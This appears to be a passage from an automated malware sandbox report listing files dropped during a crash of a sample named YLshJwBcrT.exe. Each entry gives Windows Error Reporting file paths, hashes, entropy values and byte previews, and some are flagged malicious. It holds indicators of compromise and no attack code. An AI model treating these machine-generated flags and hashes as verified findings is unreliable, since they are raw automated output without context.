                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_YLshJwBcrT.exe_12885d2dcec36f491be32bdbb77a014a21804f_c3c1b60d_e8acf310-11c0-438e-b1ec-990fed94638b\Report.wer

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.9380433644437222
                                Encrypted:false
                                SSDEEP:96:lHZfhgMZssBhaoA7Rh6tQXIDcQnc6rCcEhcw3r7+HbHg/8BRTf3Oy1F/cIP2FUto:rZs3056rQjuSZr+d+zuiFFZ24IO8e0
                                MD5:A4101922B8791211396859B71DE52B55
                                SHA1:3E7491088BA596997E8C1FAC001241686F2D7C1B
                                SHA-256:62281210083D87DE6E91759263783C79F579B881323DBFA4B4A80B01A6C38B8D
                                SHA-512:A016BB7271054FD3885E23222303784597C1D98270093240431A489B0962B4190BF0A83E13A7D232901286487697F006C448FF111FE212E7305C0167DD7C98AF
                                Malicious:true
                                Reputation:low
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.3.8.4.6.9.9.5.2.1.7.3.4.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.8.a.c.f.3.1.0.-.1.1.c.0.-.4.3.8.e.-.b.1.e.c.-.9.9.0.f.e.d.9.4.6.3.8.b.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.7.6.2.8.7.1.3.-.c.a.4.5.-.4.4.b.8.-.8.7.3.f.-.6.2.f.0.e.e.a.4.9.5.2.4.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.Y.L.s.h.J.w.B.c.r.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.7.c.-.0.0.0.1.-.0.0.1.4.-.f.b.b.5.-.a.5.d.d.4.1.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.d.4.7.0.f.5.0.1.2.0.3.7.2.e.2.b.9.2.7.a.5.2.d.e.2.0.a.2.1.f.0.0.0.0.f.f.f.f.!.0.0.0.0.d.c.2.8.8.5.1.e.6.a.0.2.c.5.6.7.d.f.e.a.b.c.d.3.d.6.4.2.f.0.6.f.5.f.5.6.9.d.5.e.!.Y.L.s.h.J.w.B.c.r.T...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.3.:.4.1.:.5.0.!.0.!.Y.L.s.h.J.w.B.c.r.T...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_YLshJwBcrT.exe_12885d2dcec36f491be32bdbb77a014a21804f_c3c1b60d_eb2ffbac-6f50-4acd-8c1e-b0b3d3b0f63f\Report.wer

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.8893824070714853
                                Encrypted:false
                                SSDEEP:96:hN5hgMTssBhaoA7Rh6tQXIDcQnc6rCcEhcw3r7+HbHg/8BRTf3Oy1F/cIP2FUtZr:7hTs3056rQjuSZr+3zuiFFZ24IO8e
                                MD5:0AE1A734D360A72CBAA7A339C02AB8E2
                                SHA1:571209FCDA66C184A4EF2DA0DCC8C3D792C96F10
                                SHA-256:F95A9DE32FEB93EB390C4E7C7A0B2FFD9A17F2C1CFE6760866949EFE2043B0BB
                                SHA-512:25151B1F5606ED49FB1914D1C5CF88054D99D3F0891751E49C63AC502A6B9BC0324CD071C49548078C817CFE91157606174ED358103BCA233DCD49B9E90EB1F9
                                Malicious:true
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.3.8.4.6.7.4.4.8.9.1.6.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.b.2.f.f.b.a.c.-.6.f.5.0.-.4.a.c.d.-.8.c.1.e.-.b.0.b.3.d.3.b.0.f.6.3.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.c.8.7.f.1.a.1.5.-.1.7.a.f.-.4.1.7.0.-.9.f.3.f.-.e.b.3.5.a.a.9.d.7.c.c.c.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.Y.L.s.h.J.w.B.c.r.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.7.c.-.0.0.0.1.-.0.0.1.4.-.f.b.b.5.-.a.5.d.d.4.1.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.d.4.7.0.f.5.0.1.2.0.3.7.2.e.2.b.9.2.7.a.5.2.d.e.2.0.a.2.1.f.0.0.0.0.f.f.f.f.!.0.0.0.0.d.c.2.8.8.5.1.e.6.a.0.2.c.5.6.7.d.f.e.a.b.c.d.3.d.6.4.2.f.0.6.f.5.f.5.6.9.d.5.e.!.Y.L.s.h.J.w.B.c.r.T...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.4././.1.0././.0.7.:.1.3.:.4.1.:.5.0.!.0.!.Y.L.s.h.J.w.B.c.r.T...e.x.e.....B.o.o.t.I.d.=.4.2.9.4.9.6.

                                C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_YLshJwBcrT.exe_828a6db89a1c4381b47c175eeee93cadfc17725f_c3c1b60d_7a321e85-eb8d-45a0-ba19-a8fb1f87f369\Report.wer

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):65536
                                Entropy (8bit):0.9561350438026262
                                Encrypted:false
                                SSDEEP:192:U6Qsi0uDwmaxdjuSZr+dQzuiFIZ24IO8L:DDp8OxdjOyzuiFIY4IO8L
                                MD5:8F4CD5785A6E5DF50374D854F0403D6B
                                SHA1:7502310CA0F0DB4FC3D08168D1971586EEB080D9
                                SHA-256:C5EFD180460B78F4866B15EDE14F6B85A93F71C831D896F294778067EE181EFB
                                SHA-512:BC11E0E7349364D843CE13B54EFF7592D0585B6C6D31D83795186807C666D0A9CBA05A02AC807B03A22C546E6EAC22C9057B8F5BD0630BDFA2D55194281B9A96
                                Malicious:true
                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.2.8.3.8.4.7.3.1.4.1.1.4.8.1.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.2.8.3.8.4.7.3.3.9.1.1.5.0.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.6.5.5.4.5.6.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.7.a.3.2.1.e.8.5.-.e.b.8.d.-.4.5.a.0.-.b.a.1.9.-.a.8.f.b.1.f.8.7.f.3.6.9.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.d.2.1.e.e.6.e.-.e.d.f.3.-.4.3.1.9.-.9.3.d.c.-.e.3.5.4.5.2.3.0.1.c.d.7.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.Y.L.s.h.J.w.B.c.r.T...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.7.c.-.0.0.0.1.-.0.0.1.4.-.f.b.b.5.-.a.5.d.d.4.1.1.9.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.b.3.d.4.7.0.f.5.0.1.2.0.3.7.2.e.2.b.9.2.7.a.5.2.d.e.2.0.a.2.1.f.0.0.0.0.f.f.f.f.!.0.0.0.0.d.c.2.8.8.5.1.e.6.a.0.2.c.5.6.7.d.f.e.a.b.c.d.3.d.6.4.2.f.0.6.f.5.f.5.6.9.d.5.e.!.Y.L.s.h.J.w.B.c.r.T...e.x.e.....T.a.r.g.e.t.A.p.p.

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER386B.tmp.dmp

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 05:21:05 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):85424
                                Entropy (8bit):1.821248478400989
                                Encrypted:false
                                SSDEEP:384:/o0CbnQoAEzWo3HIIB/53wBBm5FYjD/z0JOCGFgi:/5C7QoAEKov3wTjD/z0Q2i
                                MD5:B1EFF40D68B98BCC2E14EAEAD13E6595
                                SHA1:D95F71ACBA1AB0AFB117FD54078E7E40FB432B8E
                                SHA-256:95B2C558E3C7FC6EEB2A5586C0B7F502F8A9D82D9FA23A102D048DE8C1366085
                                SHA-512:A0000595D12C87518EA7F6D18799ABBC3CDCB4DA37D201EE02143771B5AB8662F57CE7D6F22FCFAA26FA2D6D21221FE5EDDA67BC15E3A0158B3D905DEC53DC36
                                Malicious:false
                                Preview:MDMP..a..... .......A..g.........................................0..........T.......8...........T................-......................................................................................................eJ......d.......GenuineIntel............T.......|...=..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER3937.tmp.WERInternalMetadata.xml

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8440
                                Entropy (8bit):3.705048448680475
                                Encrypted:false
                                SSDEEP:192:R6l7wVeJMc696YEIaSU4/d5gmfDFpBB89bsisfukm:R6lXJH696YEFSU4/zgmfDkshfU
                                MD5:64B1446AC8B9BA0D7BD07D42C79E6A78
                                SHA1:AF1B372732E3EDC9E9841FD433E9E5DA2C29BD21
                                SHA-256:86338A793DE39F04CF51C0B7C42C53FD5E4E1572C5C31F640E0F4E9476D13DBA
                                SHA-512:EEBE991584CAB35F59570AACEDBEF105018887F8DDAD432DF7F6EAAA042CC6DDDA679C9D27429BF81794E5731B2076906E89077633C83E6CBCB03F42510CAB8B
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.8.0.<./.P.i.

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER3967.tmp.xml

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4720
                                Entropy (8bit):4.491052723421616
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsRJg77aI9/kfWpW8VYkPfYm8M4J/HFP+q8vG0eRYld:uIjfjI7qO7Vt6JhK/SYld
                                MD5:D2226A0F2D73646953F3E968DEF56B0A
                                SHA1:15EF5F1EC8E664CA00373DF05FBB0501B5D6856E
                                SHA-256:CD13CCA20A3B97260B375CC229D2668D8DBECD77C62837DDC39B73978E47E268
                                SHA-512:475F61EF08275661686417D38F65470CA08E4A968DE97E58F838C078D1F9981AF3D0CED8A8CB9C21E35523041D43DC617C3B62673FB9449781E7CE24C1A918C2
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534023" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER3B88.tmp.dmp

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 05:21:06 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):85316
                                Entropy (8bit):1.8424448354245986
                                Encrypted:false
                                SSDEEP:384:7x0CbnNAEptmi3HErIF/qgGBBm5FYjD/z0J/zOP8WnBg:WC7NAEDP0GGTjD/z0Ejn
                                MD5:BB14CDC1D07C3ADDEC9C54859D5360F1
                                SHA1:96A10691CA06883BAD22C47B9BCD734CB4675033
                                SHA-256:8FF2615C5A5DF4900994FCC3DFE2AC5F4AE80741FDD636AA69F4B79B2B5E4E82
                                SHA-512:29BFAA6563E001B0843BF3D270156E93DD797091CBF5659EB9A939454610F99012810ACEE727C541A3B71C2FDDFE81DD07F2E19A80240C95ADA65C66C87A38DC
                                Malicious:false
                                Preview:MDMP..a..... .......B..g.........................................0..........T.......8...........T...........h ...,......................................................................................................eJ......d.......GenuineIntel............T.......|...=..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER3DFA.tmp.WERInternalMetadata.xml

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8440
                                Entropy (8bit):3.703715785660609
                                Encrypted:false
                                SSDEEP:192:R6l7wVeJMp6w6YEIkFSU4/d5gmfDFpB989bnisfTNm:R6lXJS6w6YEJFSU4/zgmfDgnhf0
                                MD5:C2E37FFA62756CB2AD5CA4CCD4E57F6A
                                SHA1:EBBC6EE58EB5EDB3A074AA044E34BFDBEF9DBFAC
                                SHA-256:5BB7095D16EAF6E4AB30E482D06217CB4CBC0294674791FF9846904C756C6EC8
                                SHA-512:7DB1280F0F4EAF60E90B18EAA37DF9144C9B195A5A4A8F4EF4ADB67B3FAA9A4EF07158B9C775720FB42F8CE740C4188D8BEA24395ECF3E95D0560C374169F45A
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.8.0.<./.P.i.

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER3E39.tmp.xml

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4720
                                Entropy (8bit):4.491060380266267
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsRJg77aI9/kfWpW8VYFYm8M4J/HFd3V+q8vG0eRYld:uIjfjI7qO7VRJJK/SYld
                                MD5:4B562C3FE75721C9DE12C5B497B24855
                                SHA1:C6BA278AFA061A25473F661271ED056A069A3EE4
                                SHA-256:E9DF626439F50C7746CF12E93566CD5DE1B2B14B0A18E1BA7E1AC419A5933EC0
                                SHA-512:4BE549D4D76E3055254487D2CC11285699FA74CDCA53AA285F0EA906FE7DF45BF6E9C12AF17CAD6E82191244C1ECDC952008CFAC3F5959FC40BFFC48ABA082B9
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534023" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER3FDD.tmp.dmp

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 05:21:07 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):95008
                                Entropy (8bit):1.6935001647359693
                                Encrypted:false
                                SSDEEP:384:OJdUJiSAEDppzfxDIN/vgtFYjD/z0JSstELPaomQGqsg:OJuJiSAEfXwjD/z09tL/A
                                MD5:837260A870052413C1E3BF7238EB11AA
                                SHA1:909552A1E0783D9FD8644B5E0045C2E8106325FE
                                SHA-256:9D23003A8F9A9191C513DB04FAB20CEACB9A03C9D344A9D556281C3073AF834C
                                SHA-512:4DD5EF19A6DB1A349DCB38F223339204E715A0AA4B7BA7F911A18E98445E9BE1676C21C79C00A6351C4ED1B97D756786B73F11F8A66EAD5C3E4D06ADE0091F64
                                Malicious:false
                                Preview:MDMP..a..... .......C..g............T...............\............6..........T.......8...........T............!..(Q..........@...........,...............................................................................eJ..............GenuineIntel............T.......|...=..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER407B.tmp.WERInternalMetadata.xml

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8438
                                Entropy (8bit):3.7045017720529185
                                Encrypted:false
                                SSDEEP:192:R6l7wVeJMG6vr6YEIkpSU4/d5gmfDFpBv89bgbisfBbGjm:R6lXJ96j6YEJpSU4/zgmfDagbhfA6
                                MD5:D1188FCDFBDB35AD58AFCBEF2A5BDEEC
                                SHA1:2D1BCDD22B515DD808F22B1E7EF63364092C0E6B
                                SHA-256:310AC606DA4CC2E89988C4E5D6A83966AD21D1E73B3142CCB9D0D3D3860BEA4E
                                SHA-512:581CE11FCE20FCFA0F7AD5460F5967D02A0D6083D0A9D2214B5E8965C9AA2CAACDEF89BB7E337936ACF4C6FF4CC39EFAA55EEEC78759B663A7E4FBA9440173EB
                                Malicious:false
                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.7.8.0.<./.P.i.

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER40AA.tmp.xml

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):4720
                                Entropy (8bit):4.491673418699922
                                Encrypted:false
                                SSDEEP:48:cvIwWl8zsRJg77aI9/kfWpW8VYZYm8M4J/HFvLSl+q8vG0eRYld:uIjfjI7qO7VZJ1kK/SYld
                                MD5:B15A1C3CD086AE9822631DEAA8599B04
                                SHA1:621E078A47EFEFE69C62E8C0F4C39B913482F17E
                                SHA-256:8B8A3479B10FA3134D9CDB644AE82FDC75E1431D01B03B4F6BAB2E1F3C03969D
                                SHA-512:ACA38905DF07A8D5986ADE4C795FCE82E919BF083FB8FB926496A717C1E77049D6BECFD9FE13CBBC05CDDB933175E198858AAB73B0F5B59A22576545C8544186
                                Malicious:false
                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="534023" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER426E.tmp.dmp

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:Mini DuMP crash report, 14 streams, Tue Oct 8 05:21:08 2024, 0x1205a4 type
                                Category:dropped
                                Size (bytes):94584
                                Entropy (8bit):1.70402820810177
                                Encrypted:false
                                SSDEEP:384:ddUJGAE6ZzFTI9/PgtFYjD/z0JAki7rUeoilE:duJGAEK5hwjD/z0mrh/E
                                MD5:FC97F9CE1A5F7E9811628E7E002B2975
                                SHA1:E4E88B5538E05173986C62C8849AE4E5D3A086CD
                                SHA-256:73BE8A0509792743C18F8A797A9DDDA354CDAB1910C515D24B3CC151DF66FEAD
                                SHA-512:343273704AD997D4B3B6235408BABDE2468928AF7FB3696FA7D015CB18AC87B5A0F4308292392E4C458634389A8EC5379AE407641D92A5529547309C7E608203
                                Malicious:false
                                Preview:MDMP..a..... .......D..g............T...............\............6..........T.......8...........T............!...O..........@...........,...............................................................................eJ..............GenuineIntel............T.......|...=..g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                C:\ProgramData\Microsoft\Windows\WER\Temp\WER42FB.tmp.WERInternalMetadata.xml

                                Download File
                                Process:C:\Windows\SysWOW64\WerFault.exe
                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):8440
                                Entropy (8bit):3.7038565675250825
                                Encrypted:false
                                SSDEEP:192:R6l7wVeJMQ6R16YEIkQSU4/d5gmfDFpBP89bZisfBzm:R6lXJL6j6YEJQSU4/zgmfD6Zhf4
                                MD5:64A1E3631A5B31C9CA6F77C389EBBF3F
                                SHA1:1EA3DEFD6819D3932D7AD3E6512B58F8AB61EE91
                                SHA-256:89B5BFA4C4D00F5EF81619354E922013AC11CBF33B5A977F359EA3E23868C3B7
                                SHA-512:FC1DA549F8A415EF8D7E0D5B1B53913C984AC3C5068407054C94BB119AAF4FBF908B905557C7B6DE6DB1E049DF5202D8CE954B8423046751C8CCDAFEF93BBA44
                                Malicious:false
